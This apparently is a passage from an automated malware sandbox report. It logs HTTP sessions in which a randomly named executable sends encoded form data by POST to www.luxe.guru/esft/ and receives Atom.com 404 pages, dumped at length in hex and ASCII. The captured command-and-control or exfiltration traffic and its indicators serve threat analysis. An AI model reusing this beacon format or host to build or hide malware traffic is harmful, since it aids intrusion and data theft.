                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 61 74 6f 6d 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 74 6f 6d 2e 63 6f 6d 20 2d 20 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 65 64 20 61 20 62 72 61 6e 64 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" type="image/png" href="https://www.atom.com/assets/images/atom-favicon.png" /> <title>Atom.com - 404 Page not found</title> <meta name="description" content="Need a brandable domain for your business? Choose from 200,000 domain names in our brandable domain marketplace curated by naming experts."> <link rel="canonical" href="https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7IRXx&gclid=EAIaIQobChMI1tLfl4XOiQMVbKpLBR1yDwAkEAAYAyAAEgKV5fD_BwE"> <meta property="og:site_name" content="Atom"> <meta property="og:image" content="https://www.atom.com/assets/imgs/domainwall.jpg"> <meta property="og:title" content="Domain Marketplace - Buy and Sell Domains - Atom"> <meta property="og:type" content="website" /> <meta name="author" content="Atom"> [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:36:09.724478006 CET1236INData Raw: 20 20 20 20 20 20 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: ::before { box-sizing: border-box } @media (prefers-reduced-motion:no-preference) { :root { scroll-behavior: smooth } }
                                                                                                                                                            Nov 12, 2024 18:36:09.724493980 CET424INData Raw: 20 20 20 20 2e 68 34 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 36 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: .h4, .h5, .h6, h1, h2, h3, h4, h5, h6 { margin-top: 0; margin-bottom: .5rem; font-weight: 500;
                                                                                                                                                            Nov 12, 2024 18:36:09.724808931 CET1236INData Raw: 70 78 29 20 7b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e
                                                                                                                                                            Data Ascii: px) { .h1, h1 { font-size: 2.5rem } } .h2, h2 { font-size: calc(1.325rem + .9vw) } @media (min-w
                                                                                                                                                            Nov 12, 2024 18:36:09.724848986 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 6f 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 75 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72
                                                                                                                                                            Data Ascii: ol, ul { margin-top: 0; margin-bottom: 1rem } ol ol, ol ul, ul ol, ul ul { margin-bottom: 0 }
                                                                                                                                                            Nov 12, 2024 18:36:09.724865913 CET424INData Raw: 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: } select { word-wrap: normal } select:disabled { opacity: 1 } textarea { resize: vertical } iframe {
                                                                                                                                                            Nov 12, 2024 18:36:09.725532055 CET1236INData Raw: 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 6c 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: .container-xl, .container-xxl { width: 100%; padding-right: var(--bs-gutter-x, .75rem); padding-left: var(--bs-gutter-x, .75rem); margin-right: auto;
                                                                                                                                                            Nov 12, 2024 18:36:09.725545883 CET1236INData Raw: 61 69 6e 65 72 2d 6c 67 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: ainer-lg, .container-md, .container-sm, .container-xl, .container-xxl { max-width: 1320px } } @media (min-width:1560px
                                                                                                                                                            Nov 12, 2024 18:36:09.725558043 CET424INData Raw: 67 69 6e 2d 74 6f 70 3a 20 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 36 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c
                                                                                                                                                            Data Ascii: gin-top: var(--bs-gutter-y) } .col-6 { flex: 0 0 auto; width: 50% } @media (min-width:576px) { .col-sm-auto { flex: 0 0 auto;
                                                                                                                                                            Nov 12, 2024 18:36:09.726371050 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68
                                                                                                                                                            Data Ascii: .col-sm-2 { flex: 0 0 auto; width: 16.66666667% } .col-sm-3 { flex: 0 0 auto; width: 25% }
                                                                                                                                                            Nov 12, 2024 18:36:09.729696035 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20
                                                                                                                                                            Data Ascii: flex: 0 0 auto; width: 100% } .offset-sm-0 { margin-left: 0 } } @media (min-width:768px) { .col-md-aut


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            34192.168.2.85001352.20.84.62806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:11.619322062 CET805OUTPOST /esft/ HTTP/1.1
                                                                                                                                                            Host: www.luxe.guru
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.luxe.guru
                                                                                                                                                            Referer: http://www.luxe.guru/esft/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 4d 78 61 2b 32 79 57 6d 50 6c 63 49 69 6c 59 47 56 68 74 58 71 79 36 49 4b 32 4c 71 31 41 79 45 4b 30 78 56 49 4a 4e 6e 67 77 37 47 50 46 70 44 44 37 54 71 59 75 65 6e 42 67 39 77 39 69 58 49 6a 4f 77 79 35 79 62 49 6c 58 53 63 4b 63 6f 74 59 5a 38 6e 4b 53 66 6e 59 68 68 63 69 43 64 36 69 48 2b 69 4c 33 35 6c 67 6d 75 54 37 42 38 46 42 43 7a 2b 2f 36 38 61 52 48 55 68 76 7a 4a 62 6a 6e 75 34 39 6c 50 49 63 76 75 34 6f 52 6d 6b 47 6b 69 37 68 53 47 51 4e 4a 45 4b 67 46 78 78 48 36 6f 66 2f 4b 6e 64 6b 38 54 4b 2b 65 75 38 58 49 6a 4f 52 30 62 6b 74 63 2b 4d 72 61 53 62 41 30 66 5a 73 59 41 55 5a 61 36 2f 46 61 2f 6d
                                                                                                                                                            Data Ascii: mnYxMt=rXgWPg4TpnazMxa+2yWmPlcIilYGVhtXqy6IK2Lq1AyEK0xVIJNngw7GPFpDD7TqYuenBg9w9iXIjOwy5ybIlXScKcotYZ8nKSfnYhhciCd6iH+iL35lgmuT7B8FBCz+/68aRHUhvzJbjnu49lPIcvu4oRmkGki7hSGQNJEKgFxxH6of/Kndk8TK+eu8XIjOR0bktc+MraSbA0fZsYAUZa6/Fa/m
                                                                                                                                                            Nov 12, 2024 18:36:12.298301935 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:12 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 52139
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "672f77fd-cbab"
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 61 74 6f 6d 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 74 6f 6d 2e 63 6f 6d 20 2d 20 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 65 64 20 61 20 62 72 61 6e 64 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" type="image/png" href="https://www.atom.com/assets/images/atom-favicon.png" /> <title>Atom.com - 404 Page not found</title> <meta name="description" content="Need a brandable domain for your business? Choose from 200,000 domain names in our brandable domain marketplace curated by naming experts."> <link rel="canonical" href="https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7IRXx&gclid=EAIaIQobChMI1tLfl4XOiQMVbKpLBR1yDwAkEAAYAyAAEgKV5fD_BwE"> <meta property="og:site_name" content="Atom"> <meta property="og:image" content="https://www.atom.com/assets/imgs/domainwall.jpg"> <meta property="og:title" content="Domain Marketplace - Buy and Sell Domains - Atom"> <meta property="og:type" content="website" /> <meta name="author" content="Atom"> [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:36:12.298440933 CET1236INData Raw: 20 20 20 20 20 20 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: ::before { box-sizing: border-box } @media (prefers-reduced-motion:no-preference) { :root { scroll-behavior: smooth } }
                                                                                                                                                            Nov 12, 2024 18:36:12.298656940 CET1236INData Raw: 20 20 20 20 2e 68 34 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 36 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: .h4, .h5, .h6, h1, h2, h3, h4, h5, h6 { margin-top: 0; margin-bottom: .5rem; font-weight: 500;
                                                                                                                                                            Nov 12, 2024 18:36:12.298669100 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 35 2c 0a 20 20 20 20
                                                                                                                                                            Data Ascii: font-size: 1.5rem } } .h5, h5 { font-size: 1.25rem } .h6, h6 { font-size: 1rem } p {
                                                                                                                                                            Nov 12, 2024 18:36:12.299247980 CET1236INData Raw: 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 75 74 74 6f 6e 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 74 67 72 6f 75 70 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63
                                                                                                                                                            Data Ascii: } button, input, optgroup, select, textarea { margin: 0; font-family: inherit; font-size: inherit; line-height: inher
                                                                                                                                                            Nov 12, 2024 18:36:12.299259901 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 35 34 30 70 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69
                                                                                                                                                            Data Ascii: max-width: 540px } } @media (min-width:768px) { .container, .container-md, .container-sm { max-width: 720px
                                                                                                                                                            Nov 12, 2024 18:36:12.299273968 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 39 30 70 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: .container { max-width: 1190px } } @media (min-width:1560px) { .container { max-width: 1480px } }
                                                                                                                                                            Nov 12, 2024 18:36:12.300129890 CET1236INData Raw: 33 33 33 33 33 33 33 33 25 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a
                                                                                                                                                            Data Ascii: 33333333% } .col-sm-2 { flex: 0 0 auto; width: 16.66666667% } .col-sm-3 { flex: 0 0 auto; width:
                                                                                                                                                            Nov 12, 2024 18:36:12.300141096 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 73 6d 2d 31 32 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: .col-sm-12 { flex: 0 0 auto; width: 100% } .offset-sm-0 { margin-left: 0 } } @media (min-width:
                                                                                                                                                            Nov 12, 2024 18:36:12.300152063 CET1236INData Raw: 38 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 36 2e 36 36 36 36 36 36 36 37 25 0a 20 20
                                                                                                                                                            Data Ascii: 8 { flex: 0 0 auto; width: 66.66666667% } .col-md-9 { flex: 0 0 auto; width: 75% } .col-md-10 {
                                                                                                                                                            Nov 12, 2024 18:36:12.303597927 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6c 2d 6c 67 2d 35 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 65 78 3a 20 30 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74
                                                                                                                                                            Data Ascii: .col-lg-5 { flex: 0 0 auto; width: 41.66666667% } .col-lg-6 { flex: 0 0 auto; width: 50% }


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            35192.168.2.85001452.20.84.62806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:36:14.161725044 CET1822OUTPOST /esft/ HTTP/1.1
                                                                                                                                                            Host: www.luxe.guru
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.luxe.guru
                                                                                                                                                            Referer: http://www.luxe.guru/esft/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 72 58 67 57 50 67 34 54 70 6e 61 7a 4d 78 61 2b 32 79 57 6d 50 6c 63 49 69 6c 59 47 56 68 74 58 71 79 36 49 4b 32 4c 71 31 41 36 45 4a 48 70 56 4a 71 6c 6e 68 77 37 47 47 6c 70 41 44 37 54 6a 59 75 57 6a 42 67 78 67 39 6e 54 49 78 38 34 79 2f 48 6e 49 77 48 53 63 43 38 6f 73 63 5a 38 49 4b 53 76 6a 59 68 52 63 69 43 64 36 69 45 6d 69 4c 6d 35 6c 6d 6d 75 51 2b 42 38 42 51 53 79 77 2f 36 31 74 52 45 35 55 6f 43 70 62 67 48 2b 34 36 54 62 49 51 76 75 36 38 78 6d 38 47 6b 65 53 68 53 4b 63 4e 49 77 67 67 43 46 78 47 4c 56 56 73 2f 48 2b 79 39 62 6c 6e 2f 7a 63 59 5a 50 32 63 6c 4c 45 69 50 65 63 69 71 79 46 50 6d 6a 71 70 70 6c 35 50 64 75 4d 49 2f 4f 72 6f 37 46 53 62 37 4d 36 30 6d 37 72 47 51 35 30 6f 6c 43 66 6b 54 4e 5a 51 6c 79 62 48 5a 4a 30 59 4b 4b 64 77 39 4c 76 4b 70 78 33 6e 4e 6f 34 67 50 5a 43 68 75 79 59 75 59 44 47 72 4e 55 5a 6a 53 4f 38 4c 33 2f 52 4b 63 4f 39 7a 2b 52 37 70 72 34 71 35 59 66 49 6f 2b 65 70 72 70 2f 45 75 51 43 63 36 79 6f 67 55 4a 6c 4d 63 49 75 [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=rXgWPg4TpnazMxa+2yWmPlcIilYGVhtXqy6IK2Lq1A6EJHpVJqlnhw7GGlpAD7TjYuWjBgxg9nTIx84y/HnIwHScC8oscZ8IKSvjYhRciCd6iEmiLm5lmmuQ+B8BQSyw/61tRE5UoCpbgH+46TbIQvu68xm8GkeShSKcNIwggCFxGLVVs/H+y9bln/zcYZP2clLEiPeciqyFPmjqppl5PduMI/Oro7FSb7M60m7rGQ50olCfkTNZQlybHZJ0YKKdw9LvKpx3nNo4gPZChuyYuYDGrNUZjSO8L3/RKcO9z+R7pr4q5YfIo+eprp/EuQCc6yogUJlMcIu6t4XX8AXMifZ6gyShtPvtT13S1AEo1tugf/X5l7len8s5m4iCSV5yxYHY9YhZSVJN0gSRCW7fq01RNqsM0NJxQvjWXExXGl8GYG5FU7VE8vp3ltyWtSWGPzUtbro4ASUFdT5zkiQX1POVjFLXqzMswhH993fu2etsF6KQz1ektCH2xitFN/iupPGxG9Uu/Xb13i5Evr6ywIHbPnpUkyTzCr3T+BW+eLDqbdMJV4ACDANV1ngQQsjXWMuERVe2Vhg3zIG3cr9/7p2W5YJsdKJ1ePXsz35Is8O0qXq+9iV7kPaoPMClddeeTzFklz94/2GDBEMaxhKKta2jObR21IlhGUs5HhEuXvtdJK1K3GGiAn9ki6q62+Eihl8pBbwtPHZH82SLtNEZgg78XjdC6v4rxyucuwmdMnKegggquHItYB4p+kxHUwGtrV3FUXHHl9jzTxaYe9rUiNRNxFCJFYNlCy4cXeErSmtsXq7jt+lwn/ytnFqFIzxPT9wnxIKPF62bfITozmfPBSYyR2BYulWhT6Lwh7lMKuLPVjrup9GYGKR/QTRXoLMRHTxDhP0H2UprRPqcdD5JNLbLAk+gOlfs+Cgr3V6rSqo+1N8534GG+9pfylquXSNSgNL2YwDLrp4F/689szKxs0nNdxFlcGBLgET597eKzwWVy [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:36:14.833102942 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:14 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 52139
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "672f77fe-cbab"
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 61 74 6f 6d 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 74 6f 6d 2e 63 6f 6d 20 2d 20 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 65 64 20 61 20 62 72 61 6e 64 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="icon" type="image/png" href="https://www.atom.com/assets/images/atom-favicon.png" /> <title>Atom.com - 404 Page not found</title> <meta name="description" content="Need a brandable domain for your business? Choose from 200,000 domain names in our brandable domain marketplace curated by naming experts."> <link rel="canonical" href="https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7IRXx&gclid=EAIaIQobChMI1tLfl4XOiQMVbKpLBR1yDwAkEAAYAyAAEgKV5fD_BwE"> <meta property="og:site_name" content="Atom"> <meta property="og:image" content="https://www.atom.com/assets/imgs/domainwall.jpg"> <meta property="og:title" content="Domain Marketplace - Buy and Sell Domains - Atom"> <meta property="og:type" content="website" /> <meta name="author" content="Atom"> [TRUNCATED]
                                                                                                                                                            Nov 12, 2024 18:36:14.833211899 CET1236INData Raw: 20 20 20 20 20 20 3a 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: ::before { box-sizing: border-box } @media (prefers-reduced-motion:no-preference) { :root { scroll-behavior: smooth } }
                                                                                                                                                            Nov 12, 2024 18:36:14.833225012 CET1236INData Raw: 20 20 20 20 2e 68 34 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 35 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 36 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 32 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                            Data Ascii: .h4, .h5, .h6, h1, h2, h3, h4, h5, h6 { margin-top: 0; margin-bottom: .5rem; font-weight: 500;
                                                                                                                                                            Nov 12, 2024 18:36:14.833734989 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 68 35 2c 0a 20 20 20 20
                                                                                                                                                            Data Ascii: font-size: 1.5rem } } .h5, h5 { font-size: 1.25rem } .h6, h6 { font-size: 1rem } p {
                                                                                                                                                            Nov 12, 2024 18:36:14.833749056 CET1236INData Raw: 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 75 74 74 6f 6e 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 74 67 72 6f 75 70 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 65 63
                                                                                                                                                            Data Ascii: } button, input, optgroup, select, textarea { margin: 0; font-family: inherit; font-size: inherit; line-height: inher
